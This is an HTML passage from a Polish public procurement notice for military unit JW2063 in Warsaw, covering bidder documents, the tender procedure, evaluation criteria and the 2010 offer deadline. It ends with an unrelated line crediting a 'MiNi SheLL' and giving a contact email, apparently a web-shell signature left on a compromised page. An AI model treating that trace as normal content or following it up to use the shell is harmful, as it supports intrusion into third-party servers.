<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jw2063.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wykonawca może zwrócić się pisemnie na adres Zamawiającego tj, JW2063, ul. Banacha 2, 00-909 Warszawa lub faksem na numer (022) 6 824 108 z prośba o SIWZ.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2010 godzina 09:00, miejsce: Jednostka Wojskowa Nr2063 ul. Banacha 2, 00-909 Warszawa, pok. 117..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com